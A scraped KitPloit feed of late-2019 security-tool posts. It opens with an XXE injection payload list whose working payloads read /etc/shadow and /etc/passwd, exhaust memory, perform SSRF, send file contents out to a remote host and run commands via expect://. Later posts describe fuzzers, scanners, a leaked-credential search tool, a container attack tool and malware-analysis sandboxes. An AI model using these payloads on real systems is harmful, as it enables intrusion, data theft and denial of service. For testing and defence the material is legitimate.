Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

XML External Entity (XXE) Injection Payload List

November 27, 2019, 1:20 pm
$
0
0
In this section, we'll explain what XML external entity injection is, describe some common examples, explain how to find and exploit various kinds of XXE injection, and summarize how to prevent XXE injection attacks.

What is XML external entity injection?
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access.
In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other backend infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.


There are various types of XXE attacks:
XXE Attack TypeDescription
Exploiting XXE to Retrieve FilesWhere an external entity is defined containing the contents of a file, and returned in the application's response.
Exploiting XXE to Perform SSRF AttacksWhere an external entity is defined based on a URL to a back-end system.
Exploiting Blind XXE Exfiltrate Data Out-of-BandWhere sensitive data is transmitted from the application server to a system that the attacker controls.
Exploiting blind XXE to Retrieve Data Via Error MessagesWhere the attacker can trigger a parsing error message containing sensitive data.

XML External Entity (XXE) Injection Payloads

XXE: Basic XML Example
<!--?xml version="1.0" ?-->
<userInfo>
<firstName>John</firstName>
<lastName>Doe</lastName>
</userInfo>

XXE: Entity Example
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&example;</lastName>
</userInfo>

XXE: File Disclosure
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&ent;</lastName>
</userInfo>

XXE: Denial-of-Service Example
<!--?xml version="1.0" ?-->
<!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<tag>&lol9;</tag>

XXE: Local File Inclusion Example
<?xml version="1.0"?>
<!DOCTYPE foo [  
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>

XXE: Blind Local File Inclusion Example (When first case doesn't return anything.)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>

XXE: Access Control Bypass (Loading Restricted Resources - PHP example)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>&ac;</result></foo>

XXE:SSRF ( Server Side Request Forgery ) Example
<?xml version="1.0"?>
<!DOCTYPE foo [  
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>

XXE: (Remote Attack - Through External Xml Inclusion) Exmaple
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
<lolz><lol>3..2..1...&test<lol></lolz>

XXE: UTF-7 Exmaple
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4

XXE: Base64 Encoded
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>

XXE: XXE inside SOAP Example
<soap:Body>
<foo>
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
</foo>
</soap:Body>

XXE: XXE inside SVG
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls"></image>
</svg>

References :
XML External Entity (XXE) Processing
XML External Entity Prevention Cheat Sheet
Testing for XML Injection (OTG-INPVAL-008)


Search

ATFuzzer - Dynamic Analysis Of AT Interface For Android Smartphones

November 28, 2019, 4:00 am
$
0
0

"Opening Pandora's Box through ATFuzzer: Dynamic Analysis of AT Interface for Android Smartphones" is accepted to the 35th Annual Computer Security Applications Conference (ACSAC) 2019. https://relentless-warrior.github.io/wp-content/uploads/2019/11/atfuzz.pdf

Abstract
This paper focuses on checking the correctness and robustness of the AT command interface exposed by the cellular baseband processor through Bluetooth and USB. A device’s application processor uses this interface for issuing high-level commands (or, AT commands) to the baseband processor for performing cellular network operations (e.g., placing a phone call). Vulnerabilities in this interface can be leveraged by malicious Bluetooth peripherals to launch various attacks including DoS and privacy attacks. To identify such vulnerabilities, we propose ATFuzzer that uses a grammar-guided evolutionary fuzzing approach which mutates production rules of the AT command grammar instead of concrete AT commands. Empirical evaluation with ATFuzzer on 8 Android smartphones from 5 vendors revealed 4 invalid AT command grammars over Bluetooth and 13 over USB with implications ranging from DoS, downgrade of cellular protocol version to severe privacy leaks.

Run ATFuzzer

Requirements
Python 2.7.15. Please do not use python 3 because there are library incompatibilities. The required libraries are specified in the file requirements.txt and they can be installed executing the command:
pip install -r requirements.txt
Note: the module pybluez for python 2.7 is not compatible with Windows. To install pybluez on Windows it is necessary to download a previous version. Download PyBluez‑0.22‑cp27 at pybluez and install it with the command:
pip install <pybluez file.whl>

How to run
To run ATFuzzer execute the following command:
sudo python executeFuzzer.py <list_of_grammars> <device_name> <port (optional)>
Alternatively, it is possible to execute ATFuzzer with multiple random chosen grammars with the command:
sudo python executeFuzzer.py multi <device_name> <port (optional)>
The program then asks to choose among 4 option:
  • 0 - Standard fuzzer (includes crossover, mutation, feedback evaluation)
  • 1 - No feedback fuzzer
  • 2 - No crossover fuzzer
  • 3 - No mutation fuzzer
These options allows the user to choose which type of ATFuzzer to run. This is fundamental to test and evaluate the effectiveness of our fuzzer.
Finally, ATFuzzer requires to specify which channel will be used for the AT commands transmission. It is possible to select one among three options:
  • b - Bluetooth
  • u - USB
  • t - Test execution (does not require any connected device)
If the Bluetooth option is selected, the program asks for the Bluetooth address of the target device. The user may insert the Bluetooth MAC address of the device in the specific format: XX:XX:XX:XX:XX:XX (e.g., 1A:2B:3C:4D:5E:6F).
Test execution executes ATFuzzer with fake evaluation parameters and without submitting any command to a device. This option is only for testing purpose, so do not use it to fuzz an actual smartphone.
Note: if you run Bluetooth ATFuzzer on Linux, it may be necessary to execute the program with sudo, depending on the system configuration.

Structure of ATFuzzer implementation
In the following we provide a description of the struture of the implementation of ATFuzzer.
commandGrammar.json: json file which contains a set of grammars for more that 80 AT commands. The grammars are defined following a specific structure that allows the program to efficiently read them.
executeFuzzer.py: main program which allows the user to run ATFuzzer. It provides different options of execution (see How to run).
grammarFuzzer.py: implements the actual fuzzing. It reads the grammars for the AT commands submitted by the user and performs the fuzzing loop: input generation - input submission - grammar evaluation - grammar evolution.
multiGrammarFuzzer.py: implements the actual fuzzing. It reads the grammars for the randomly chosen AT commands and performs the fuzzing loop: input generation - input submission - grammar evaluation - grammar evolution.
grammarModifier.py: implements the functions for the evolution phase. Such functions include grammar crossover and grammar mutation.
inputGen.py: generates an random AT command instance given a input grammar.
atCmdInterface.py: implements the functions necessary to interact with the AT interface of the target device. It is responsible for setting up the communication with the device, submitting the AT command instances, and finally collecting and evaluating the responses.
afl_fuzzer.py: implements the functions used to execute AFL fuzzer in the context of AT commands.
utilityFunctions.py: implements support functions for the execution of the main program.
results: directory containg the results of each ATFuzzer execution.


Netstat2Neo4J - Create Cypher Create Statements For Neo4J Out Of Netstat Files From Multiple Machines

November 28, 2019, 12:33 pm
$
0
0

Graphs help to spot anomalies and patterns in large datasets.
This script takes netstat information from multiple hosts and formats them in a way to make them importable into Neo4j.
Neo4j can be queried for find connections to certain hosts, from certain hosts, find out the usage or protocols and much more.

Example Files
There are already some files in the example directory for you to be able to test the tool.
you can also find example queries which will help you to have a basic idea of the possibilities of the search

Status
Currently the tool is tested with the netstat output of Windows systems using the command 'netstat -an'

Setup

Install docker and docker-compose
https://docs.docker.com/install/linux/docker-ce/centos/
https://docs.docker.com/compose/install/

Extract Files
git clone https://github.com/trinitor/netstat2neo4j.git /opt/netstat2neo4j/

Start Container
cd /opt/netstat2neo4j/docker
docker-compose up -d

Test Logon
https://ip:7473
user: neo4j
pass: neo4j

Upload Netstat Files
copy all netstat out files (*.txt files) into /opt/netstat2neo4j/script/import/

Create Cypher Statements for Neo4j
cd /opt/netstat2neo4j/script/
bash csv2neo4j.sh
the needed cypher statements can be found in create_database.txt

Create Database
browse to https://localhost:7473
Copy content from create_database.txt
Paste into the command bar of the neo4j interface

Example Query
MATCH (src)-[:DEPENDS_ON]->(dst)
WHERE src.ip STARTS WITH '192_168_'
RETURN src, dst
There is a query.txt in the example folder as well.

Q&A
Q: This is redundant. Don't you know there are other projects?
A: I do. This is not new or special. There are free projects, tutorials and commercial products based on agents to draw maps and even enforce rules.
Some examples:
This small project is by no means a replacement.
Q: Creating netstats on all machines is hard. Do you have a solution?
A: While you can collect the information with WMI/PowerShell remoting I do not recommend to have an account that has full admin rights on all your systems.
Use your configuraiton managment to schedule the netstat creation or use schedulded tasks. This is out of scope for this small little project.
If you want to use an accout with all the keys to the kindom:
https://ijustwannared.team/2019/04/22/network-connection-footprinting-with-wmi-and-neo4j/
Q: You must be wrong. Neo4j must be able to read CSV files directly. Why are you creating the statements by yourselve?
A: You are right. It is possible to import CSV files directly.
https://neo4j.com/developer/guide-import-csv/


BaseQuery - A Way To Organize Public Combo-Lists And Leaks In A Way That You Can Easily Search Through Everything

November 29, 2019, 3:30 am
$
0
0

Your private data is being traded and sold all over the internet as we speak. Tons of leaks come out on a daily basis which can make you feel powerless. The majority of user-passwords and other sensitive information have been posted somewhere on the internet/darknet for any prying eyes to see, whether you like it or not. To take more control of what personal info is out there you can use Haveibeenpwned to narrow down which breaches your information has been exposed in. This is a great start but what if you want to know exactly what information of yours other people have access to? BaseQuery is an all in one program that makes importing and searching through thousands of data-breac hes easy.

Features Included:
  • A 4x nested storage structure
  • Average import speeds of 12,000+ entries per second (Intel Core i7-7700HQ CPU @ 2.8GHz)
  • Instantaneous querying system
  • Facebook's zstd lossless compression algorithm to reduce the size of the data (On average reduces the data to less than 10% of the original size)
  • Calculate the time all your files will take to import based on your specific hardware
  • Duplicate data protection
  • Output all of your findings in a standard format
  • Email harvesting built-in

Installing
To Install BaseQuery type the following commands
git clone https://github.com/g666gle/BaseQuery.git
sudo chmod 755 -R BaseQuery/
cd BaseQuery
./dependencies.sh
./run.sh

Getting Started
  1. Place any databases that you have into the "PutYourDataBasesHere" folder
    • As of right now, BaseQuery can only accept files in the format where each line is either "test@example.com:password" or "password:test@example.com"
    • It doesn't matter if the line formats are mixed up within the same file. Ex) The first line may be "email:password" and the second line can be "password:email"
    • One entry per line!!
    • If you need a better visual there is an example.txt file in the folder "PutYourDataBasesHere"
    • You should delete the example file before running the program.
  2. Now that you have all of your files in the correct folder
    • Open up a terminal in the BaseQuery directory.
    • Type ./dependencies.sh to install all of the resources needed ( You only need to do this once )
    • Type ./run.sh to start the program ( Starts the program )
    • Note that if you are using a laptop make sure it is plugged in. Importing databases uses A LOT of processing power and will make the import 4 times faster on average!
  3. Follow the instructions on the screen
    • That's it, enjoy!
    • Contact me with any issues.

Import Times Based on Hardware Specifics


Query Options


Prerequisites
Note: All of these are automatically installed using the 'dependencies.sh' script
Update packages:    (sudo apt-get update)

Python Version 3.6+ (sudo apt-get install python3.7)
Bash 4+
tar                 (sudo apt-get install tar)
zstd                (sudo apt-get install zstd)
xterm               (sudo apt-get install xterm)

Built With
  • Ubuntu 18.04 bionic
  • Bash Version: GNU bash, version 4.4.19(1)-release (x86_64-pc-linux-gnu)
  • Python Version: 3.7.1

Authors


Attack Monitor - Endpoint Detection And Malware Analysis Software

November 29, 2019, 1:03 pm
$
0
0

Attack Monitor is Python application written to enhance security monitoring capabilites of Windows 7/2008 (and all later versions) workstations/servers and to automate dynamic analysis of malware.
Current modes (mutually exclusive):
  • Endpoint detection (ED)
  • Malware analysis (on dedicated Virtual Machine)
Based on events from:
  • Windows event logs
  • Sysmon
  • Watchdog (Filesystem monitoring Python library)
  • TShark (only malware analysis mode)

Current version
0.9.0 (Alpha)

Contact
attack.monitor.github@gmail.com

Demo



Supported OS
  • Windows 7, 8, 10 (x86 or x64)
  • Windows 2008, 2012, 2016 (x86 or x64)

Pre-requirements
  • Powershell 5
  • Sysmon (Downloaded, configured and installed by installer.py)
  • Python 3.6 (64-bit) - should work on Python 3.x
  • Tshark (Malware analysis only)
  • Various Python3 libraries (requirements.txt)
  • StoneEngine library (included, first time published, high level windows event log interface - Alpha state)

Supported system events
Some of the events are only supported in Malware Analysis Mode
  • Filesystem changes
  • Permitted network connections
  • PowerShell activity (detailed only with PowerShell 5)
  • Process creation
  • SMB activity
  • Scheduled tasks
  • Local accounts manipulations
  • Success/Failed logins
  • Drivers load
  • Raw disk access
  • Registry monitoring
  • Pipe events
  • Services
  • Audit log cleared
  • WMI monitoring of queries + WMI persistence
  • DNS requests capture (via Tshark)

Installation - Endpoint Detection Mode
For Malware analysis mode - refer to next section
STEPS:
<Download newest release>
cmd.exe (Run as admin)
pip3 install -U -r requirements.txt
python installer.py sysmon
  => Choose endpoint detection mode
python installer.py psaudit
python installer.py auditpol
python installer.py install
  => Choose endpoint detection mode
python installer.py exceptions
[Apply section] Installation - How to enable WMI audit?

Installation - Malware analysis Mode
For Endpoint detection mode - refer to previous section
STEPS:
<Download newest release>
cmd.exe (Run as admin)
pip3 install -U -r requirements.txt
python installer.py sysmon
  => Choose malware analysis mode
python installer.py psaudit
python installer.py auditpol
python installer.py install
  => Choose malware analysis mode
[Install tshark] https://www.wireshark.org/download.html // To default location
[Apply section] Installation - How to choose network interface for malware listening? // (currently only DNS)
[Apply section] Installation - How to enable WMI audit?
[Apply section] Installation - How to monitor specific directories?

Installation - How to enable WMI audit?
compmgmt.msc
Services and Applications -> WMI Control -> Properties
Security -> Security -> Advanced -> Auditing -> Add

Select principal: Everyone
Type: All
Show advanced permissions:
  Select all (Execute Methods ... Edit Security)
Why it's not in installer.py script? It's hard to do it programmatically

Installation - How to choose network interface for malware listening?
Edit C:\Program Files\Attack Monitor\config\attack_monitor.cfg
Change in section [feeder_network_tshark]: network_interface=PUT INTERFACE NAME HERE # without quotes

How to determine inteface name?
TShark is using name from Control Panel\Network and Internet\Network Connections (Change adapter settings) e.g. name: WiFi AC => Custom name defined by user e.g. name: Ethernet0

Installation - How to monitor specific directories?
Edit C:\Program Files\Attack Monitor\config\monitored_directories.json
For malware analysis it's recommended to monitor all events (except dir_modified) for directory C:\ with recursive flag enabled. Please add also additional directories if relevant.

How it works?
  1. Alert is coming from source (Windows Event Log, Sysmon, Filesystem change, TShark)
  2. Alert is checked against config\exceptions\exception.json which contains all alerts which should be ignored A) For Endpoint Detection - Predefined set of ignored alerts is delivered with software B) For Malware analysis - you need to add exceptions yourself on live system in clean state
  3. Alert is present in exception.json? Yes) Is discared [Go to step 1] No) Go to next step
  4. Is learning mode enabled? (Can be enabled in tray icon, or permanently in configuration file) Yes) Alert window popup asking you if you want to ignore this alert, if yes which fields must match to consider event as ignored? (simple comparision, substring, regex)
    • If you decided to add exception for this alert - Alert is added to exceptions [Go to step 1]
    • If you decided to skip exception window - Go to next step
    No) Go to next step
  5. Alert user about capture event. Outputs:
    • System tray baloon notification (Only when you are moving mouse and computer isn't locked)
    • Alert is saved to logs\.txt

Known bugs
  • Exit isn't gracefull
  • Tray icon appears and disappears


Mordor - Re-play Adversarial Techniques

November 30, 2019, 3:30 am
$
0
0


The Mordor project provides pre-recorded security events generated by simulated adversarial techniques in the form of JavaScript Object Notation (JSON) files for easy consumption. The pre-recorded data is categorized by platforms, adversary groups, tactics and techniques defined by the Mitre ATT&CK Framework. The pre-recorded data represents not only specific known malicious events but additional context/events that occur around it. This is done on purpose so that you can test creative correlations across diverse data sources, enhancing your detection strategy and potentially reducing the number of false positives in your own environment.
The name Mordor comes from the awesome book/film series "The Lord of the Rings", and it was a place where the evil forces of Sauron lived. This repository is where data generated by known "malicious" adversarial activity lives, hence the name of the project.


Goals
  • Provide free portable malicious datasets to expedite the development of data analytics.
  • Facilitate adversarial techniques simulation and output consumption.
  • Allow security analysts to test their skills with real known bad data.
  • Improve the testing of hunting use cases and data analytics in an easier and more affordable way.
  • Enable data scientists to have semi-labeled data for initial research.
  • Map threat hunter playbooks to their respective pre-recorded data for validation purposes.
  • Contribute to the ATT&CK frameworkData Sources section of each technique and sub-technique.
  • Ingest known bad data samples for training and capture the flag (CTF) events.
  • Learn more about red team simulation exercises and technology such as Kafkacat, Kafka and Jupyter Notebooks.

Getting Started

Projects Using Mordor

Authors

Contributing
There are a few things that we would like to accomplish with this repo as shown in the To-Do list below. Share your pre-recorded data with us following our same setup (working on a standard setup..), and help others in the Cyber community to validate their detection use cases in a faster and easier way.

License: GPL-3.0
Mordor's GNU General Public License

To-Do
  • Dynamically generate mordor datasets readme files in restructuredtext
  • Release environment scripts
  • Add OSquery to endpoints for Linux/macOS
  • Share Terraform & Packer config files to deploy the same environment in the cloud
  • Add a Bro sensor
  • Multiple custom network setup for contributions
  • Add toolsets to the Empire box inside of AWS configuratons
  • Prepare Large Dataset ;)
  • Logo
More coming soon...


Subdomain3 - A New Generation Of Tool For Discovering Subdomains

November 30, 2019, 12:52 pm
$
0
0

Subdomain3 is a new generation of tool , It helps penetration testers to discover more information in a shorter time than other tools.The information includes subdomains, IP, CDN, and so on. Please enjoy it.

Features
  • More quick
Three patterns for speed. User can modify the configuration(lib/config.py) file to speed-up.
  • CDN support
Determines whether the subdomain uses CDN storage automatically,even though the dict of CDN severs not contain the cname suffix.
  • RFC CIDR
Sorting ip and report CIDR(example 1.1.1.1/24) that it not use CDN storage;
  • Multi-level subdomain support
Discover more subdomains,example:admin.test.xx.com
  • Big dict support
Million of subs support
  • Less resource consumption
1 CPU/1GB Memory/1Mbps bandwidth
  • More intelligent
Discover the fastest nameserver;The strategy of dynamically adjusting of dict by importing subdomains from other sources;Prevent dns cache pollution;

Getting started
git clone https://github.com/yanxiu0614/subdomain3.git

pip install -r requirement.txt

python2/3 brutedns.py -d tagetdomain -s high -l 5

Usage
Short FormLong FormDescription
-d--domaintarget domain,for example: baidu.com
-s        --speedspeed,three patterns:fast,medium,low
-l--levelexample: 2:w.baidu.com; 3:w.w.baidu.com;
-f--fileThe list of target domain
-c--cnamen or y,collect cnames
-ns--default_dnsn or y
-f1--sub_filesub dict
-f2--next_sub_filenext sub dict
-f3--other_filesubdomain log from search engine

Thanks:

Changelog:
  • 2019-09-22: New strategy to prevent dns cache pollution;Optimize the processes,Fixed bug e.g
  • 2019-09-17: Automatically discover the fastest nameserver support;Determines whether the subdomain uses CDN storage automatically support;Improve the speed;Optimize the processes,Fix bug e.g
  • 2018-11-6: Improve the speed;Optimize the processes;
  • 2018-10-6: Api support,import brutedns_api and you will get the number of results in the end;Optimized the deduplication strategy;
  • 2018-2-14: Fix issue(TypeError: argument of type 'NoneType' is not iterable)
  • 2018-1-9: CDN PLAN;Add opthon oc collecting cname (-c --cdn t/f)
  • 2017-11-11: Import subdomains from other sources support(You should create a new file of target_domain.log, and put it with 'brutedns.py' in the same directory),it will improve the accuracy;it is more convenient for use API;
  • 2017-10-26: Optimize the processes;Fix bug;
  • 2017-10-11:Rebuild part of the program; Api support; Result is more readable;Update cdn-severs;faster
  • 2017-6-17: Delete universal parse opthon(-p t/f);Add a file of config;Optimze strategy for universal parse
  • 2017-5-2: Add a module(validate the domain),please modify "result_name" in the validate_domain.py if you will use it;fix universal bug;update cdn-servers,etc
  • 2017-4-21: Optimze strategy for generating subname,Improve the speed
  • 2017-3-23: Add universal parse opthon(-p t/f)
  • 2017-3-17: Big dict support(for example: two million)
  • 2017-3-10: Read several domains from file support(-f domains) support;Update cdn-servers
  • 2017-2-26: Multilevel domain support(no upper limit);Big dict support;Take up about a third to a quarter as much memory;Faster
  • 2017-2-24: Mac support
Monster Zero Team 2019


CCAT - Cloud Container Attack Tool For Testing Security Of Container Environments

December 1, 2019, 3:30 am
$
0
0

Cloud Container Attack Tool (CCAT) is a tool for testing security of container environments.

Quick reference

Requirements
  • Python 3.5+ is required.
  • Docker is required. Note: CCAT is tested with Docker Engine 19.03.1 version.
  • Named profile is required for using AWS functionality.
  • A service account or access token is required for using GCP functionality.

Installation
We recommend using the provided Docker image to run CCAT, so that you will not face any difficulty with the required dependencies on your own system.
Install CCAT from source
  $ git clone https://github.com/RhinoSecurityLabs/ccat.git
  $ cd ccat
  $ python3 setup.py install
  $ python3 ccat.py
Use CCAT's Docker Image
Warning: Running this command will mount your local AWS configuration files into the Docker container when it is launched. This means that any user with access to the container will have access to your host computer's AWS credentials.
Warning: Running this command will mount your local Unix socket that Docker daemon listens on by default into the Docker container when it is launched. This means that users with access to the container will have access to your Docker daemon, meaning they could escape to your host computer with ease.
  $ docker run -it -v ~/.aws:/root/.aws/ -v /var/run/docker.sock:/var/run/docker.sock -v ${PWD}:/app/ rhinosecuritylabs/ccat:latest

Getting Started

Example Usage
Below is an example scenario to demonstrate the usage of CCAT.
Starting with compromised AWS credentials, the attacker enumerates and explores ECR repositories. Then, the attacker found that they use NGINX Docker image and pulled that Docker image from ECR. Furthermore, the attacker creates a reverse shell backdoor into the target Docker image. Finally, the attacker pushes the backdoored Docker image to ECR.

Exploitation Route:


VIDEO Exploitation Route Walkthrough with CCAT:



Exploitation Route Walkthrough with CCAT:
Visit Step by Step Scenario Page.

Roadmap
  • Container Escape Features
  • Amazon ECS Attack Features
  • Amazon EKS Attack Features
  • Azure Container Related Attack Features
  • GCP Container Related Attack Features
  • OpenShift Container Related Attack Features
  • IBM Cloud Container Related Attack Features
  • Alibaba Cloud Container Related Attack Features

Disclaimer
  • CCAT is tool that comes with absolutely no warranties whatsoever. By using CCAT, you take full responsibility for any and all outcomes that result.


Search

Goblin - An Impish, Cross-Platform Binary Parsing Crate, Written In Rust

December 1, 2019, 1:01 pm
$
0
0

Documentation
https://docs.rs/goblin/
changelog

Usage
Goblin requires rustc 1.31.1.
Add to your Cargo.toml
[dependencies]
goblin = "0.1"

Features
  • awesome crate name
  • zero-copy, cross-platform, endian-aware, ELF64/32 implementation - wow!
  • zero-copy, cross-platform, endian-aware, 32/64 bit Mach-o parser - zoiks!
  • PE 32/64-bit parser - bing!
  • a Unix and BSD style archive parser (latter courtesy of @willglynn) - huzzah!
  • many cfg options - it will make your head spin, and make you angry when reading the source!
  • fuzzed - "I am happy to report that goblin withstood 100 million fuzzing runs, 1 million runs each for seed 1~100." - @sanxiyn
  • tests
libgoblin aims to be your one-stop shop for binary parsing, loading, and analysis.

Use-cases
Goblin primarily supports the following important use cases:
  1. Core, std-free #[repr(C)] structs, tiny compile time, 32/64 (or both) at your leisure.
  2. Type punning. Define a function once on a type, but have it work on 32 or 64-bit variants - without really changing anything, and no macros! See examples/automagic.rs for a basic example.
  3. std mode. This throws in read and write impls via Pread and Pwrite, reading from file, convenience allocations, extra methods, etc. This is for clients who can allocate and want to read binaries off disk.
  4. Endian_fd. A truly terrible name this is for binary analysis like in panopticon or falcon which needs to read binaries of foreign endianness, or as a basis for constructing cross platform foreign architecture binutils, e.g. cargo-sym and bingrep are simple examples of this, but the sky is the limit.
Here are some things you could do with this crate (or help to implement so they could be done):
  1. Write a compiler and use it to generate binaries (all the raw C structs have Pwrite derived).
  2. Write a binary analysis tool which loads, parses, and analyzes various binary formats, e.g., panopticon or falcon.
  3. Write a semi-functioning dynamic linker.
  4. Write a kernel and load binaries using no_std cfg. I.e., it is essentially just struct and const defs (like a C header) - no fd, no output, no std.
  5. Write a bin2json tool, because why shouldn't binary formats be in JSON?

Cfgs
libgoblin is designed to be massively configurable. The current flags are:
  • elf64 - 64-bit elf binaries, repr(C) struct defs
  • elf32 - 32-bit elf binaries, repr(C) struct defs
  • mach64 - 64-bit mach-o repr(C) struct defs
  • mach32 - 32-bit mach-o repr(C) struct defs
  • pe32 - 32-bit PE repr(C) struct defs
  • pe64 - 64-bit PE repr(C) struct defs
  • archive - a Unix Archive parser
  • endian_fd - parses according to the endianness in the binary
  • std - to allow no_std environments

Contributors

In lexicographic order:


ANDRAX v4 DragonFly - Penetration Testing on Android

December 2, 2019, 3:21 am
$
0
0

ANDRAX is a Penetration Testing platform developed specifically for Android smartphones, ANDRAX has the ability to run natively on Android so it behaves like a common Linux distribution, But more powerful than a common distribution!

The development of ANDRAX began on 08/09/2016 (DD/MM/YYYY) only for people in Brazil
ANDRAX has been fully redefined and reloaded on 05/10/2018 (DD/MM/YYYY) open to the international public.

ANDRAX enable to all Android device with root access enabled and a good unlocked rom become a weapon for advanced Penetration Testing.

Why is Android so powerful?

Simple, everyone has a smartphone and spends all the time with it! We have the possibility to camouflage easily in the middle of everyone, the processor architecture of most Android smartphones is ARM a modern and robust architecture extremely superior to the rest, With touch screens we can run the tools with great agility and take advantage of the graphical interface of Android, we can get in almost anywhere with our smartphones...

In technical terms, ANDRAX and NetHunter should never be compared, ANDRAX is a penetration testing platform for Android smartphones and NetHunter is just a Debian emulator running with chroot.

Termux is not our enemy, Termux is an application that allows installation of many Linux packages using a Debian environment running natively on Android.
ANDRAX and Termux have a similar development, ANDRAX and Termux share many libs and GNU/Linux resources.

But Termux is not a penetration testing platform, it's software to bring basic tools found in a Debian environment. Penetration tests are not something basic! But advanced techniques that involve advanced tools and a advanced environment to conduct good tests!

So you can install many tools manually in Termux but it would be extremely difficult to optimize and configure them to take 100% of the required potential for penetration testing.

Termux runs without root privileges and this makes it very difficult to use advanced tools. 

ANDRAX promotes the use of more than 900 advanced tools for Hacking, Cracking and Penetration Testing.

Screenshots







More info in official site.

CAPE - Malware Configuration And Payload Extraction

December 2, 2019, 12:27 pm
$
0
0

CAPE is a malware sandbox. It is derived from Cuckoo and is designed to automate the process of malware analysis with the goal of extracting payloads and configuration from malware. This allows CAPE to detect malware based on payload signatures, as well as automating many of the goals of malware reverse engineering and threat intelligence.
There is a community version online which is free for anyone to try:
https://cape.contextis.com/submit
CAPE can detect a number of malware techniques or behaviours, as well as specific malware families, from its initial run on a sample. This detection may then trigger a further run with a specific package, in order to extract the malware payload and possibly its configuration, for further analysis.
CAPE works by controlling malware via a bespoke debugger and API hooks. Detection to trigger a CAPE package can be based on API or Yara signatures. The debugger uses Yara signatures or API hooks to allow breakpoints to be set on individual instructions, memory regions or function calls. Once a region of interest is reached, it can be manipulated and dumped for processing and analysis, and possibly configuration parsing.

The techniques or behaviours that CAPE detects and has packages for include:
  • Process injection
    • Shellcode injection
    • DLL injection
    • Process Hollowing
    • Process Doppelganging
  • Decompression of executable modules in memory
  • Extraction of executable modules or shellcode in memory
Packages for these behaviours will dump the payloads being injected, extracted or decompressed for further analysis. This is often the malware payload in unpacked form.
CAPE automatically creates a process dump for each process, or, in the case of a DLL, the DLL's module image in memory. This is useful for samples packed with simple packers, where often the module image dump is fully unpacked. Yara signatures may trigger on the process dumps, possibly resulting in submission with a specific package or configuration parsing.
CAPE also has a package which can dynamically unpack samples that use 'hacked' (modified) UPX, very popular with malware authors. These samples are run in CAPE's debugger until their OEP (original entry point), whereupon they are dumped, fixed and their imports are automatically reconstructed, ready for analysis.
Currently CAPE has specific packages dumping configuration and payloads for the following malware families:
  • PlugX
  • EvilGrab
  • Sedreco
  • Cerber
  • TrickBot
  • Hancitor
  • Ursnif
  • QakBot
CAPE has config parsers/decoders for the following malware families, whose payloads are automatically extracted by a behavioural package:
  • Emotet
  • RedLeaf
  • ChChes
  • HttpBrowser
  • Enfal
  • PoisonIvy
  • Screech
  • TSCookie
  • Dridex
  • SmokeLoader
Many other malware families have their payloads automatically extracted by behavioural packages, for which CAPE uses Yara signatures to detect the payloads. This list is growing, and includes:
  • Azorult, Formbook, Ryuk, Hermes, Shade, Remcos, Ramnit, Gootkit, QtBot, ZeroT, WanaCry, NetTraveler, Locky, BadRabbit, Magniber, Redsip, Kronos, PetrWrap, Kovter, Azer, Petya, Dreambot, Atlas, NanoLocker, Mole, Codoso, Cryptoshield, Loki, Jaff, IcedID, Scarab, Cutlet, RokRat, OlympicDestroyer, Gandcrab, Fareit, ZeusPanda, AgentTesla, Imminent, Arkei, Sorgu, tRat, T5000, TClient, TreasureHunter.
